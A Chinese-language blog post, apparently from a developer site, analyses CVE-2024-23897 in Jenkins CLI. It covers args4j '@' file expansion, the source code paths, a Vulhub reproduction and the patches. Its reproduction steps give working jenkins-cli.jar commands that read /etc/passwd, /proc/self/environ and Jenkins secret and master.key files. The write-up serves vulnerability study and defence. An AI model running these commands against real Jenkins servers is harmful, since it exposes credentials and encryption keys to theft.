CVE-2024-23897源码分析与漏洞复现(Jenkins 任意文件读取)

漏洞概述

漏洞编号 :CVE-2024-23897
CVSS 评分 :9.8
影响版本

  • Jenkins 主分支 ≤ 2.441
  • Jenkins LTS 分支 ≤ 2.426.2

修复版本 :≥ 2.442(主分支) / ≥ 2.426.3(LTS)
漏洞类型 :未授权任意文件读取(Arbitrary File Read)
根本原因 :Jenkins CLI 使用 args4j 库解析命令参数时,默认启用 @ 文件路径扩展功能expandAtFiles),攻击者可利用该特性读取服务器任意文件(如 /etc/passwd、加密密钥等),结合其他漏洞链可能导致 远程代码执行(RCE)


技术细节与源码分析

1. 漏洞触发原理

Jenkins CLI 通过 args4j 库解析用户输入命令时,若参数以 @ 开头,则触发文件内容替换逻辑:

bash 复制代码
java -jar jenkins-cli.jar -s http://target:8080 who-am-i '@/etc/passwd'  

执行流程

  1. CLI 将 @/etc/passwd 识别为文件路径;
  2. 调用 expandAtFiles 方法读取文件内容;
  3. 将文件内容作为参数注入命令上下文。

2. 关键源码定位

(1)漏洞入口:CLICommand#getCmdLineParser

代码路径hudson/cli/CLICommand.java

java 复制代码
protected CmdLineParser getCmdLineParser() {  
    CmdLineParser parser = new CmdLineParser(this);  
    parser.setAtSyntax(true); //  默认启用 @ 文件扩展功能  
    return parser;  
}  

问题setAtSyntax(true) 强制开启文件路径解析,未做安全限制。

(2)文件读取逻辑:expandAtFiles 方法

代码路径org/kohsuke/args4j/CmdLineParser.java

java 复制代码
private String expandAtFiles(String arg) throws IOException {  
    if (arg.startsWith("@")) {  
        File f = new File(arg.substring(1));  
        return FileUtils.readFileToString(f, StandardCharsets.UTF_8); // 直接读取文件  
    }  
    return arg;  
}  

漏洞点

  • 未校验文件路径合法性(如 ../ 路径遍历);
  • 未验证用户权限,支持读取任意路径。
(3)命令执行流:CLICommand#main

代码路径hudson/cli/CLICommand.java

java 复制代码
public void main(String[] args) {  
    CmdLineParser parser = getCmdLineParser();  
    parser.parseArgument(args); //  触发参数解析  
    run(); // 执行命令  
}  

调用链parseArgumentexpandAtFilesreadFileToString

3. 权限与读取能力的关系
攻击者权限 文件读取能力
未认证用户 读取任意文件的前 3 行
认证用户(Overall/Read) 完整读取任意文件(包括二进制文件)

:二进制文件(如 secrets/master.key)因字符编码转换可能部分损坏,但密钥仍可提取。


漏洞复现

环境搭建

1.使用 Vulhub 环境启动漏洞靶机
bash 复制代码
  docker-compose up -d
2.访问访问 http://target:8080,确认服务正常运行

攻击步骤

  • 利用该漏洞可以直接使用官方提供的命令行客户端,在http://localhost:8080/jnlpJars/jenkins-cli.jar下载。

  • 使用该工具读取目标服务器的/proc/self/environ文件,可以找到Jenkins的基础目录,JENKINS_HOME=/var/jenkins_home

    java -jar jenkins-cli.jar -s http://localhost:8080/ -http help 1 "@/proc/self/environ"

  • 然后,可在该目录下读取敏感文件,如secrets.key or master.key(匿名情况下,只能通过命令行的报错读取文件的第一行):

    java -jar jenkins-cli.jar -s http://localhost:8080/ -http help 1 "@/var/jenkins_home/secret.key"

复制代码
java -jar jenkins-cli.jar -s http://localhost:8080/ -http help 1 "@/var/jenkins_home/secrets/master.key"
  • 因为开启了"匿名用户可读"选项,你也可以直接使用connect-node命令读取完整文件内容:

    java -jar jenkins-cli.jar -s http://localhost:8080/ -http connect-node "@/etc/passwd"


修复方案

1. 官方补丁

  • 升级版本

    • 主分支升级至 ≥ 2.442;
    • LTS 分支升级至 ≥ 2.426.3;
  • 补丁逻辑 :在 CLICommand.java 中禁用 @ 语法:

    java 复制代码
    parser.setAtSyntax(false); // 关闭文件扩展功能  

    补丁代码提交

2. 临时缓解措施

  • 禁用 CLI 访问

    bash 复制代码
    java -jar jenkins-cli.jar -s http://target:8080 disable-cli  
  • 权限最小化 :禁用匿名用户的 Overall/Read 权限。


漏洞启示

  1. 依赖库安全审计args4j 的默认危险功能需显式关闭,第三方库可能引入未知攻击面;
  2. 纵深防御实践
    • 关键服务(如 Jenkins)禁止公网暴露;
    • 定期轮转加密密钥(如 master.key);
  3. 自动化响应:结合 WAF(如 Cloudflare)实时阻断攻击流量,减少应急响应时间⏳。

参考链接

  1. Jenkins 官方安全公告(2024-01-24)
  2. 补丁代码对比(GitHub)
  3. 漏洞复现与 PoC(FreeBuf)
相关推荐
要开心吖ZSH2 分钟前
《Spring 中上下文传递的那些事儿》Part 4:分布式链路追踪 —— Sleuth + Zipkin 实践
java·分布式·spring
桦说编程22 分钟前
深入解析CompletableFuture源码实现
java·性能优化·源码
真实的菜32 分钟前
Jenkins 插件深度应用:让你的CI/CD流水线如虎添翼 [特殊字符]
servlet·ci/cd·jenkins
蓝澈11211 小时前
迪杰斯特拉算法之解决单源最短路径问题
java·数据结构
Kali_071 小时前
使用 Mathematical_Expression 从零开始实现数学题目的作答小游戏【可复制代码】
java·人工智能·免费
rzl021 小时前
java web5(黑马)
java·开发语言·前端
时序数据说1 小时前
为什么时序数据库IoTDB选择Java作为开发语言
java·大数据·开发语言·数据库·物联网·时序数据库·iotdb
guojl2 小时前
深度解读jdk8 HashMap设计与源码
java
guojl2 小时前
深度解读jdk8 ConcurrentHashMap设计与源码
java
00后程序员张2 小时前
免Mac上架实战:全平台iOS App上架流程的工具协作经验
websocket·网络协议·tcp/ip·http·网络安全·https·udp